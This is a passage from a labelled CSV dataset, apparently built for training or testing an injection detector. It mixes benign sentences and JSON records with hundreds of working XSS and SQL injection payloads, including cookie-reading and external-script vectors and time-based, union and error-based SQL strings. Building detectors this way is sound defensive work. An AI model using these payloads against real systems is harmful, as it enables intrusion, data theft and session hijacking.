onmouseleave=""alert(1)"">test</param>",1,XSS,7131 "-6906' where 1839 = 1839 union all select 1839,1839,1839,1839,1839--",2,SQLi,16401 Order a refreshing drink.,3,normal,22693 -3966' ) or 7338 = 8657,2,SQLi,21356 "<dt draggable=""true"" ondrag=""alert(1)"">test</dt>",1,XSS,5948 "<link draggable=""true"" ondragend=""alert(1)"">test</link>",1,XSS,4585 AnD SLEEP(5)--,2,SQLi,22200 "1' ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( 'ywxe' like 'ywxe",2,SQLi,12256 Select the right palette for the artwork.,3,normal,23995 "1%"" ) ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13094 "-1949 ) as smyn where 4066 = 4066 union all select 4066,4066--",2,SQLi,16929 Just select the books category with the drop-down list at the top of the page and type in the topic you are looking for.,3,normal,25931 "<script src=""data:\xD4\x8F,javascript:alert(1)""></script>",1,XSS,3985 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19",2,SQLi,14710 <details onpointerenter=alert(1)>XSS</details>,1,XSS,6305 "=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23",2,SQLi,9912 "<div draggable=""true"" contenteditable>drag me</div><multicol ondragover=alert(1) contenteditable>drop here</multicol>",1,XSS,782 "-2849' union all select 6491,6491,6491,6491,6491,6491,6491--",2,SQLi,17177 admin' or '1'='1'#,2,SQLi,22022 "<rp onkeyup=""alert(1)"" contenteditable>test</rp>",1,XSS,5980 "select sleep ( 5 ) and ( ( ""%"" = """,2,SQLi,20155 "<XML ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>",1,XSS,2198 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ( 4142 = 4142",2,SQLi,14113 "{""id"":null,""name"":""thou bag""}",3,normal,27466 1 ) as msat where 1267 = 1267,2,SQLi,20696 You can always select the crib of your choice and register it at department stores.,3,normal,25101 <x%0Donxxx=1,1,XSS,9835 "<colgroup onclick=""alert(1)"">test</colgroup>",1,XSS,6982 "1' ) ) ) union all select null,null,null,null,null--",2,SQLi,18235 "1 ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )",2,SQLi,11848 "1%"" and ( 2850 = 6610 ) *6610 and ""%"" = """,2,SQLi,19417 <bdo id=x tabindex=1 onbeforedeactivate=alert(1)></bdo><input autofocus>,1,XSS,2378 1' ) ) as eymg where 7000 = 7000,2,SQLi,20247 "-5043%' ) ) ) union all select 5860,5860,5860,5860,5860#",2,SQLi,17654 Where did you find that charming restaurant?,3,normal,23930 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( table_name ) FROM ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables ) WHERE LIMIT = 1 ) ) AND 'i' = 'i",2,SQLi,11507 <x contenteditable onblur=alert(1)>lose focus!,1,XSS,6513 "1' and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and 'hzav' = 'hzav",2,SQLi,13303 Double check that the cover you select will fit your car seat.,3,normal,26235 "-6883"" ) as tbai where 8121 = 8121 union all select 8121,8121,8121,8121,8121,8121,8121,8121--",2,SQLi,14497 <tfoot id=x tabindex=1 onactivate=alert(1)></tfoot>,1,XSS,5441 "1' and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and 'sloy' = 'sloy",2,SQLi,10783 "<marquee onmouseover=""alert(1)"">test</marquee>",1,XSS,6495 "><img src=x:x"" onerror=""alert(XSS)"">",1,XSS,8967 "&lt;IMG SRC=\"" javascript&#058;alert('XSS');\""&gt;",1,XSS,5512 "`""'><img src=xxx:x onerror\x0A=javascript:alert(1)>",1,XSS,5332 "{""id"":null,""firstName"":""Hung"",""lastName"":""Tan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27199 <caption id=x tabindex=1 onactivate=alert(1)></caption>,1,XSS,4533 &#0060,1,XSS,9869 "1' where 3339 = 3339 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) --",2,SQLi,15611 "1"" ) ) as pxdp where 4575 = 4575 and elt ( 8258 = 7218,7218 ) --",2,SQLi,16773 "-9505' ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 'qhdg' = 'qhdg",2,SQLi,10166 "1' ) ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( 'qtni' = 'qtni",2,SQLi,12113 Insert the disc.,3,normal,22846 """,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,16555 "1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) )",2,SQLi,18076 "1'+ ( select 'mikf' where 5814 = 5814 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11304 Or when you see today a long economic expansion and good times rolling but for only a select few people in a select few cities.,3,normal,25809 Select the perfect camera settings.,3,normal,24076 <x ondblclick=alert(1)>double click this!,1,XSS,7791 "<;SCRIPT/XSS SRC="";http://ha.ckers.org/xss.js"";>;<;/SCRIPT>;",1,XSS,3458 1'|| ( select 'xlmt' where 1664 = 1664,2,SQLi,19679 <applet id=x tabindex=1 onactivate=alert(1)></applet>,1,XSS,4942 <svg><html onload=alert(1)></html>,1,XSS,9226 Create a soothing melody.,3,normal,22656 "Measure the space, and take these measurements with you when to go to store to shop to insure the bookcases you select will fit your floor space.",3,normal,25889 1 ) as ztrb where 1052 = 1052 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,14940 She chose a menu for the dinner party from the chef.,3,normal,23766 "-8414%"" ) union all select 2795#",2,SQLi,20334 <img srcset=validimage.png onload=alert(1)>,1,XSS,7102 <button onRowsEnter=javascript:alert(1)>,1,XSS,8083 "-5139 ) ) union all select 3373,3373,3373,3373,3373,3373,3373,3373#",2,SQLi,16486 Where's the fire department?,3,normal,23514 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7",2,SQLi,18655 Select your debate.,3,normal,24913 "{""id"":null,""firstName"":""Latte"",""lastName"":""Shu"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27553 Select your demand.,3,normal,24968 Let's explore where the walking trail leads.,3,normal,23877 1'+ ( select ijoh where 7145 = 7145 order by 1--,2,SQLi,18687 Select location.,3,normal,24549 1' ) ) as rxxd where 5049 = 5049,2,SQLi,20305 Where's the gym?,3,normal,23603 <BODY ONLOAD=javascript:alert(1)>,1,XSS,9315 "<br oncopy=""alert(1)"" contenteditable>test</br>",1,XSS,6174 "<label onbeforecopy=""alert(1)"" contenteditable>test</label>",1,XSS,3633 "-2382%' ) union all select 8885,8885,8885,8885,8885,8885,8885#",2,SQLi,16979 <img/src=@&#32;&#13; onerror = prompt('&#49;'),1,XSS,6274 "<style>@keyframes slidein {}</style><code style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></code>",1,XSS,394 "<blockquote oncut=""alert(1)"" contenteditable>test</blockquote>",1,XSS,3193 "&lt;EMBED SRC=\""data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\"" type=\""image/svg+xml\"" AllowScriptAccess=\""always\""&gt;&lt;/EMBED&gt;",1,XSS,18 "1"" ) as eaxo where 2728 = 2728",2,SQLi,20610 select sleep ( 5 ) and ( ( 'mmvf' like 'mmvf,2,SQLi,19080 "{""id"":null,""name"":""addition""}",3,normal,27010 Create a memorable moment.,3,normal,22590 "-2790%"" ) union all select 5070,5070#",2,SQLi,19901 They give you the option to select movies by themselves (as of this writing they have about 450 movies to choose from) or in DVD bundles.,3,normal,25314 <keygen onpointerout=alert(1)>XSS</keygen>,1,XSS,7397 -9100 ) or 8792 = 9550--,2,SQLi,21254 "<style>:target {transform: rotate(180deg);}</style><option id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></option>",1,XSS,595 "<span onkeydown=""alert(1)"" contenteditable>test</span>",1,XSS,4721 "<s draggable=""true"" ondragend=""alert(1)"">test</s>",1,XSS,5829 "1 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,10773 Select the best wedding videographer.,3,normal,24387 ORDER BY 10#,2,SQLi,22304 1 ) ) as rvex where 3462 = 3462 and 4595 = 4595#,2,SQLi,18763 hi or a=a,2,SQLi,22456 "<param onkeyup=""alert(1)"" contenteditable>test</param>",1,XSS,4800 1' and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and 'omlt' = 'omlt,2,SQLi,10658 "<output oncut=""alert(1)"" contenteditable>test</output>",1,XSS,4797 "1%"" ) ) ) and 4595 = 4595#",2,SQLi,21006 "1 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a )",2,SQLi,11258 <sup onpointermove=alert(1)>XSS</sup>,1,XSS,8659 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><picture id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></picture>",1,XSS,165 "<style>:target {transform: rotate(180deg);}</style><sup id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></sup>",1,XSS,673 "{""id"":null,""name"":""gradually""}",3,normal,26864 "1 ) ) ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ( 5340 = 5340",2,SQLi,14332 "{""id"":null,""firstName"":""Krisalya"",""lastName"":""Zakiyah"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27325 "-9697 ) union all select 3052,3052,3052,3052,3052,3052,3052,3052,3052--",2,SQLi,16076 I want to select a movie for tonight.,3,normal,23806 "1"" ) as uyns where 4751 = 4751 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) --",2,SQLi,14852 Plant flowers outside.,3,normal,22782 "<plaintext onmouseover=""alert(1)"">test</plaintext>",1,XSS,5544 SLEEP(5)--,2,SQLi,22425 <mark onpointerenter=alert(1)>XSS</mark>,1,XSS,7996 Select a quote for your daily inspiration.,3,normal,24064 tan,3,normal,23219 "1' or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )",2,SQLi,10924 <track onpointerdown=alert(1)>XSS</track>,1,XSS,7761 "<aside onkeyup=""alert(1)"" contenteditable>test</aside>",1,XSS,4839 1'|| ( select 'aioq' from dual where 8176 = 8176,2,SQLi,18701 &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00,1,XSS,6551 Select the best project.,3,normal,24324 "<abbr onkeypress=""alert(1)"" contenteditable>test</abbr>",1,XSS,4483 "<center onkeypress=""alert(1)"" contenteditable>test</center>",1,XSS,3718 "1' ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( 'uzxr' = 'uzxr",2,SQLi,10861 "<command onmouseenter=""alert(1)"">test</command>",1,XSS,6142 "1"" ) ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ""qnqb"" like ""qnqb",2,SQLi,9980 "<style>@keyframes x{}</style><tbody style=""animation-name:x"" onanimationstart=""alert(1)""></tbody>",1,XSS,1551 "1'|| ( select 'xbwg' where 7518 = 7518 union all select null,null,null,null,null,null--",2,SQLi,14842 -3861' ) as zmja where 4036 = 4036 or 9323 = 9323#,2,SQLi,18452 "<style>:target {color: red;}</style><address id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></address>",1,XSS,769 "<image xmlns:xlink=""http://www.w3.org/1999/xlink"">",1,XSS,5695 Select the best approach.,3,normal,24296 <body onmessage=alert(1)>,1,XSS,9703 "{""id"":null,""firstName"":""Desmond"",""lastName"":""Tan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27500 Please select a team.,3,normal,24283 1'|| ( select 'mosp' where 6085 = 6085,2,SQLi,19710 "<pre draggable=""true"" ondragstart=""alert(1)"">test</pre>",1,XSS,4519 "1' where 1893 = 1893 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12435 Grab a free Google Home Mini with the purchase of select Tile Bluetooth Tracker 4-Packs See Details Get a $39 Amazon Echo Dot for free when you buy select Tile 4-Packs.,3,normal,26138 Select trace.,3,normal,24666 "<picture onkeypress=""alert(1)"" contenteditable>test</picture>",1,XSS,3294 <td onpointerdown=alert(1)>XSS</td>,1,XSS,9014 "<div draggable=""true"" contenteditable>drag me</div><ul ondrop=alert(1) contenteditable>drop here</ul>",1,XSS,1405 "<audio controls autoplay onratechange=alert(1)><source src=""validaudio.wav"" type=""audio/wav""></audio>",1,XSS,1384 "-4256' ) where 9545 = 9545 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,10364 Identify columns where required.,3,normal,23354 "hi' or 'x' = 'x',",2,SQLi,22086 <audio controls ondurationchange=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>,1,XSS,1640 1' ) ) ) rlike ( select ( case when ( 5855 = 7142 ) then 1 else 0x28 end ) ) and ( ( ( 'fkhd' = 'fkhd,2,SQLi,14107 "<bdi onmouseup=""alert(1)"">test</bdi>",1,XSS,8803 Identify columns where necessary.,3,normal,23333 <basefont onpointerout=alert(1)>XSS</basefont>,1,XSS,6408 <rtc onpointerup=alert(1)>XSS</rtc>,1,XSS,9077 "select * from users where id = 1 or ""; ( "" or 1 = 1 -- 1",2,SQLi,17587 "<rb draggable=""true"" ondragend=""alert(1)"">test</rb>",1,XSS,5450 "1' ) ) as ewsw where 4667 = 4667 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,12192 <embed code=javascript:javascript:alert(1);></embed>,1,XSS,5080 1 ) where 2232 = 2232,2,SQLi,21590 "1"" and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,13588 "-9638 ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( ( 3679 = 3679",2,SQLi,17097 "<aside onbeforecut=""alert(1)"" contenteditable>test</aside>",1,XSS,3852 Delete the old messages from your chat.,3,normal,22951 "iif ( 4836 = 1823,1,1/0 )",2,SQLi,21151 "<caption onmousedown=""alert(1)"">test</caption>",1,XSS,6490 "-3261"" ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( ""yxms"" = ""yxms",2,SQLi,10169 "1' ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 )",2,SQLi,13852 "<input onpaste=alert(1) value="""" autofocus>",1,XSS,7157 Whatever you select will delete all transcripts within that range.,3,normal,25164 "<isindex ondblclick=""alert(1)"">test</isindex>",1,XSS,6613 "<ins onkeydown=""alert(1)"" contenteditable>test</ins>",1,XSS,5181 "1%"" ) ) ) rlike sleep ( 5 ) #",2,SQLi,20760 "1' ) ) as babx where 2494 = 2494 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12354 -6217 ) ) as hyws where 3441 = 3441 or 9421 = 4695#,2,SQLi,18292 "select sleep ( 5 ) and ( ( ""rthl"" like ""rthl",2,SQLi,19127 "{""id"":null,""firstName"":""Quan"",""lastName"":""Yuan"",""address"":""11 Kaki Bukit Road 1, 02-08 Eunos Technolink"",""city"":""481"",""telephone"":""954522226""}",3,normal,26780 "<a href=javas\x00cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2496 ORDER BY 7#,2,SQLi,22365 ",NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,19444 a' or 'a' = 'a,2,SQLi,22193 "<script onReadyStateChange script onReadyStateChange=""javascript:javascript:alert(1)""></script onReadyStateChange>",1,XSS,847 "<! foo=""><script>alert(91)</script>"">",1,XSS,8737 "1%' ) ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ( '%' = '",2,SQLi,11940 "1"" ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ""nwzu"" like ""nwzu",2,SQLi,11895 "1' ) ) as prxm where 1267 = 1267 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12439 "<IMG SRC="" &#14; javascript:alert('');"">",1,XSS,7970 Where's the martial arts dojo?,3,normal,23605 "<strike onmouseup=""alert(1)"">test</strike>",1,XSS,7343 1' and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ),2,SQLi,13915 "In ' FrontPage Editor ', select the tab at the bottom called ' HTML ' .",3,normal,26036 Select your oath.,3,normal,24958 "<thead onmouseenter=""alert(1)"">test</thead>",1,XSS,7140 "<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>",1,XSS,2966 "-4205' union all select 8986,8986,8986,8986,8986,8986,8986,8986,8986,8986#",2,SQLi,15775 "1%"" ) ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,18937 "-7235"" ) union all select 4624,4624,4624,4624,4624,4624,4624,4624,4624,4624#",2,SQLi,15500 <i id=x tabindex=1 onbeforeactivate=alert(1)></i>,1,XSS,5774 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--",2,SQLi,17456 Identify rows where applicable.,3,normal,23471 "-3116"" ) ) ) union all select 4600,4600,4600,4600--",2,SQLi,18368 <menuitem onblur=alert(1) tabindex=1 id=x></menuitem><input autofocus>,1,XSS,2532 "1%"" ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( ""%"" = """,2,SQLi,11162 "{""id"":null,""firstName"":""P Elan"",""lastName"":""Charan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27619 "1' or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and 'ptou' = 'ptou",2,SQLi,14740 "<ins onmousedown=""alert(1)"">test</ins>",1,XSS,8432 "<sup draggable=""true"" ondragend=""alert(1)"">test</sup>",1,XSS,4919 "<progress onmousedown=""alert(1)"">test</progress>",1,XSS,5903 "*{color:red}</style>//[""'`-->]]>]</div>",1,XSS,8289 ))) waitfor delay '0:0:20' /*,2,SQLi,20670 Launching in select Saks Fifth Avenue locations and at Saks.,3,normal,25916 "<del onpaste=""alert(1)"" contenteditable>test</del>",1,XSS,5658 "-8791"" ) ) ) or make_set ( 6681 = 6620,6620 ) and ( ( ( ""pvdk"" = ""pvdk",2,SQLi,16151 or a=a–,2,SQLi,22521 "<tt draggable=""true"" ondrag=""alert(1)"">test</tt>",1,XSS,5909 <svg><noframes onload=alert(1)></noframes>,1,XSS,7376 "-4637"" where 8354 = 8354 or 1186 = 2714--",2,SQLi,19386 One Child Nation opened in select theaters on August 9.,3,normal,25830 """We will select one big operator by country,"" Breton said.",3,normal,26450 <content onpointerdown=alert(1)>XSS</content>,1,XSS,6724 They must select now.,3,normal,24268 "Aluminium is so light that it is a matter requiring some ingenuity to select a convenient solvent through which it shall sink quickly, for if it does not sink, it short-circuits the electrolyte.",3,normal,26388 "1' ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( 'lbwh' = 'lbwh",2,SQLi,12710 "<data ondblclick=""alert(1)"">test</data>",1,XSS,8267 <tfoot onpointerdown=alert(1)>XSS</tfoot>,1,XSS,7696 "1 ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,19546 <svg onpointerenter=alert(1)>XSS</svg>,1,XSS,8328 "{""id"":null,""name"":""continued""}",3,normal,27528 "1 ) as hlit where 4973 = 4973 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,12289 "1' or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11445 "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>",1,XSS,1828 1 where 4949 = 4949,2,SQLi,21963 "1'+ ( select 'ovti' where 4243 = 4243 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) ) +'",2,SQLi,12353 "<style>:target {transform: rotate(180deg);}</style><command id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></command>",1,XSS,562 "<data draggable=""true"" ondragleave=""alert(1)"">test</data>",1,XSS,4109 "<u draggable=""true"" ondragleave=""alert(1)"">test</u>",1,XSS,5437 "<rtc draggable=""true"" ondragleave=""alert(1)"">test</rtc>",1,XSS,4439 "-1766"" ) ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( ""ydzq"" like ""ydzq",2,SQLi,10406 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--",2,SQLi,17850 <xss onpointerup=alert(1) style=display:block>XSS</xss>,1,XSS,4408 "{""id"":null,""firstName"":""Ho"",""lastName"":""Kwee Huay"",""address"":""Sentosa - Ferry Terminal (U/C) 1 Garden Avenue #01-05a"",""city"":""610"",""telephone"":""880519616""}",3,normal,26993 "1 ) ) union all select null,null,null,null,null,null#",2,SQLi,18097 Select a class to take for self-improvement.,3,normal,24000 "=+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+",2,SQLi,9921 "In choosing fish, select ones that hold their fins erect, and avoid those with split fins, hold their fins tight against their bodies, hover at the bottom of the tank or hide in the corners.",3,normal,26017 ORDER BY 22,2,SQLi,22380 """,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,18904 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--",2,SQLi,15120 "<optgroup draggable=""true"" ondragleave=""alert(1)"">test</optgroup>",1,XSS,2819 "AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND 1337"" LIKE ""1337",2,SQLi,16748 ") AND ELT(1337=1337,SLEEP(5)) AND (""1337""=""1337",2,SQLi,18816 "You will be performing many quick stops and starts, so make sure the shoes you select have adequate cushioning.",3,normal,25064 "<a onkeypress=""alert(1)"" contenteditable>test</a>",1,XSS,5784 -8625 or 3176 = 2519# fvgl,2,SQLi,20990 "1 ) ) as mgvw where 4923 = 4923 union all select null,null,null,null--",2,SQLi,16187 "benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,20133 "1"" ) union all select null,null,null,null--",2,SQLi,19193 &lt;!--[if gte IE 4]&gt;,1,XSS,9718 "1 ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( 9325 = 9325",2,SQLi,10723 "{""id"":14217,""firstName"":""jmeter"",""lastName"":""jmeter"",""address"":""used in jmeter test (DO NOT DELETE)"",""city"":""jmeter"",""telephone"":""6512345678""}",3,normal,26809 "1"" ) as uuth where 8555 = 8555 union all select null,null#",2,SQLi,17420 "-3219"" ) order by 1--",2,SQLi,21695 <a onmouseover=alert(document.cookie)\>xxs link\</a\>,1,XSS,4897 Where's the bar?,3,normal,23547 Merge the data sources into one file.,3,normal,22975 1%' ) ) union all select null--,2,SQLi,20446 "To do so, use the remote to select the app.",3,normal,25278 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noframes id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></noframes>",1,XSS,150 "-2821"" ) ) ) union all select 3920,3920,3920,3920,3920,3920,3920#",2,SQLi,16693 1'|| ( select 'uebk' from dual where 6990 = 6990,2,SQLi,18776 <IMG SRC=”jav ascript:alert(‘XSS’);”>,1,XSS,8558 exec sp,2,SQLi,22524 "-8629 where 8049 = 8049 union all select 8049,8049,8049,8049,8049,8049,8049#",2,SQLi,15487 trim,3,normal,23196 "<legend oncopy=""alert(1)"" contenteditable>test</legend>",1,XSS,4445 <embed onpointerenter=alert(1)>XSS</embed>,1,XSS,7449 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><html id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></html>",1,XSS,238 "select * from users where id = 1 + $+*$ union select null,@@VERSION -- 1",2,SQLi,15925 "{""id"":null,""name"":""beyond""}",3,normal,27069 "1' in boolean mode ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) #",2,SQLi,10778 <details onpointerup=alert(1)>XSS</details>,1,XSS,7126 He said he likes the Financial Select Sector SPDR Fund.,3,normal,26117 "-4033' ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 